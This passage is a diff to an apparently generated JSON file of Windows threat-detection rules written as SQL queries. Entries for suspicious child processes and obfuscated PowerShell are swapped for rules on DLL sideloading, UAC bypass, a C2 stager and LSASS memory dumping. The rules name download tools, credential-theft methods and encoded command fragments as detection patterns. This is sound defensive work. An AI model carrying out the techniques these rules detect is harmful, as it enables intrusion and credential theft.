'%\\\\findstr.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wget.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\accesschk.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bcdedit.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cipher.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\write.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\query.exe' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%start%' ESCAPE '\\'))) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%.spl%' ESCAPE '\\' OR CommandLine LIKE '%route add%' ESCAPE '\\' OR CommandLine LIKE '%program files%' ESCAPE '\\')))) OR (NewProcessName LIKE '%\\\\netsh.exe' ESCAPE '\\' AND NOT ((CommandLine LIKE '%add portopening%' ESCAPE '\\' OR CommandLine LIKE '%rule name%' ESCAPE '\\')))) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND NOT (CommandLine LIKE '%.spl%' ESCAPE '\\'))) OR ((NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND CommandLine LIKE '%rundll32.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 
'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_spoolsv_susp_child_processes.yml" + "filename": "image_load_dll_vss_ps_susp_load.yml" }, { - "title": "Script Event Consumer Spawning Process", - "id": "f6d1dd2f-b8ce-40ca-bc23-062efb686b34", - "status": "experimental", - "description": "Detects a suspicious child process of Script Event Consumer (scrcons.exe).", - "author": "Sittikorn S", + "title": "Fax Service DLL Search Order Hijack", + "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", + "status": "test", + "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", + "author": "NVISO", "tags": [ - "attack.execution", - "attack.t1047" + "attack.persistence", + "attack.defense_evasion", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT 
(ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_scrcons_susp_child_process.yml" + "filename": "image_load_side_load_ualapi.yml" }, { - "title": "Suspicious PowerShell Child Processes", - "id": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", - "status": "experimental", - "description": "Detects suspicious child processes spawned by PowerShell", - "author": "Florian Roth (Nextron Systems), Tim Shelton", + "title": "Load Of Dbghelp/Dbgcore DLL From Suspicious Process", + "id": "0e277796-5f23-4e49-a490-483131d4f6e1", + "status": "test", + "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecraft use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "author": "Perez Diego (@darkquassar), oscd.community, Ecco", + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\sh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\certutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scrcons.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\hh.exe' ESCAPE '\\' OR NewProcessName 
LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\forfiles.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkspacesConfig\\\\Scripts\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\dbghelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dbgcore.dll' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msbuild.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\winword.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\excel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\outlook.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\monitoringhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\bash.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dnx.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvcs.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\scriptrunner.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE 'C:\\\\WINDOWS\\\\winsxs\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\TiWorker.exe -Embedding' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_susp_child_processes.yml" + "filename": "image_load_dll_dbghelp_dbgcore_susp_load.yml" }, { - "title": "Suspicious Obfuscated PowerShell Code", - "id": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "title": "Microsoft Office DLL Sideload", + "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", "status": 
"experimental", - "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", + "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", "tags": [ - "attack.defense_evasion" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%IAAtAGIAeABvAHIAIAAwAHgA%' ESCAPE '\\' OR CommandLine LIKE '%AALQBiAHgAbwByACAAMAB4A%' ESCAPE '\\' OR CommandLine LIKE '%gAC0AYgB4AG8AcgAgADAAeA%' ESCAPE '\\' OR CommandLine LIKE '%AC4ASQBuAHYAbwBrAGUAKAApACAAfAAg%' ESCAPE '\\' OR CommandLine LIKE '%AuAEkAbgB2AG8AawBlACgAKQAgAHwAI%' ESCAPE '\\' OR CommandLine LIKE '%ALgBJAG4AdgBvAGsAZQAoACkAIAB8AC%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADAAfQB7ADMAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACIAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAiACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AIgAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMQB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADEAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAxAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMAB9AHsAMwB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE 
'%B7ADAAfQB7ADMAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAwAH0AewAzAH0AJwAgAC0AZgAg%' ESCAPE '\\' OR CommandLine LIKE '%AHsAMgB9AHsAMAB9ACcAIAAtAGYAI%' ESCAPE '\\' OR CommandLine LIKE '%B7ADIAfQB7ADAAfQAnACAALQBmAC%' ESCAPE '\\' OR CommandLine LIKE '%AewAyAH0AewAwAH0AJwAgAC0AZgAg%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_encoded_obfusc.yml" + "filename": "image_load_side_load_office_dlls.yml" }, { - "title": "Control Panel Items", - "id": "0ba863e6-def5-4e50-9cea-4dd8c7dc46a4", + "title": "HackTool - SILENTTRINITY Stager DLL Load", + "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", "status": "test", - "description": "Detects the malicious use of a control panel item", - "author": "Kyaw Min Thein, Furkan Caliskan (@caliskanfurkan_)", + "description": "Detects SILENTTRINITY stager dll loading activity", + "author": "Aleksey Potapov, oscd.community", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218.002", - "attack.persistence", - "attack.t1546" + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '%add%' ESCAPE '\\' AND CommandLine LIKE '%CurrentVersion\\\\Control Panel\\\\CPLs%' ESCAPE '\\')) OR (CommandLine LIKE '%.cpl' ESCAPE '\\' AND NOT (((CommandLine LIKE '%\\\\System32\\\\%' ESCAPE '\\' OR CommandLine 
LIKE '%\\%System\\%%' ESCAPE '\\')) OR (CommandLine LIKE '%regsvr32 %' ESCAPE '\\' AND CommandLine LIKE '% /s %' ESCAPE '\\' AND CommandLine LIKE '%igfxCPL.cpl%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" ], - "filename": "proc_creation_win_control_panel_item.yml" + "filename": "image_load_hktl_silenttrinity_stager.yml" }, { - "title": "Invoke-Obfuscation CLIP+ Launcher", - "id": "b222df08-0e07-11eb-adc1-0242ac120002", + "title": "UAC Bypass With Fake DLL", + "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", "status": "test", - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "author": "Jonathan Cheong, oscd.community", + "description": "Attempts to load dismcore.dll after dropping it", + "author": "oscd.community, Dmitry Uchakin", "tags": [ + "attack.persistence", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1548.002", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Actions of a legitimate telnet client" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%clipboard]::%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_clip.yml" + "filename": "image_load_uac_bypass_via_dism.yml" }, { - "title": "Windows Update Client LOLBIN", - "id": "d7825193-b70a-48a4-b992-8b5b3015cc11", + "title": "Potential DLL Sideloading Of Non-Existent DLLs From System Folders", + "id": 
"6b98b92b-4f00-4f62-b4fe-4d1920215771", "status": "experimental", - "description": "Detects code execution via the Windows Update client (wuauclt)", - "author": "FPT.EagleEye Team", + "description": "Detects DLL sideloading of system dlls that are not present on the system by default. Usually to achieve techniques such as UAC bypass and privilege escalation", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.execution", - "attack.t1105", - "attack.t1218" + "attack.defense_evasion", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'wuauclt.exe') AND (CommandLine LIKE '%/UpdateDeploymentProvider%' ESCAPE '\\' AND CommandLine LIKE '%/RunHandlerComServer%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '% /ClassId %' ESCAPE '\\' OR CommandLine LIKE '% wuaueng.dll %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\wbemcomn.dll' ESCAPE '\\') AND NOT ((Signed = 'true' AND Signature = 'Microsoft Windows')))" ], - "filename": "proc_creation_win_wuauclt_execution.yml" + "filename": "image_load_side_load_non_existent_dlls.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION", - "id": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "status": "test", - "description": "Detects 
Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "title": "Potential System DLL Sideloading From Non System Locations", + "id": "4fc0deee-0057-4998-ab31-d24e46e0aba4", + "status": "experimental", + "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.001", + "attack.t1574.002" ], "falsepositives": [ - "Unknown" + "Legitimate applications loading their own versions of the DLLs mentioned in this rule" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%&&set%' ESCAPE '\\' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%/c%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%{0}%' ESCAPE '\\' OR CommandLine LIKE '%{1}%' ESCAPE '\\' OR CommandLine LIKE '%{2}%' ESCAPE '\\' OR CommandLine LIKE '%{3}%' ESCAPE '\\' OR CommandLine LIKE '%{4}%' ESCAPE '\\' OR CommandLine LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((ImageLoaded LIKE '%\\\\shfolder.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\activeds.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\adsldpc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aepic.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\apphelp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\applicationframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxalluserstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appxdeploymentclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\archiveint.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\atl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\audioses.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\auditpolcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\authfwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\authz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\avrt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcd.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47langs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcp47mrm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bcrypt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabinet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cabview.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\certenroll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cldapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clipc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\clusapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmpbk32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coloradapterclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\colorui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\comdlg32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\connect.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coremessaging.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptxml.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cscui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d2d1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10\\_1core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d10warp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d11.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d12.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\d3d9.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dataexchange.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\davclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\defragproxy.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\desktopshellext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\deviceassociation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicecredential.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devicepairing.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devobj.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\devrtl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcmonitor.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dhcpcsvc6.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\directmanipulation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcfgutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcmnutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenrollengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmenterprisediagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmiso8601utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmoleaututils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmprocessxmlfiltered.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmpushproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmxmlhelputils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dnsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3api.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dot3cfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsparse.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsreg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsrole.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dui70.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\duser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dusmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwrite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxgi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxva2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eappcfg.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\eappprxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edputil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsadu.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\efsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\esent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\execmodelproxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\explorerframe.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\faultrep.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fddevquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\feclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\firewallapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\flightsettings.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fltlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwcfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpolicyiomgr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fwpuclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\getuname.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hid.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\hnetmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\httpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 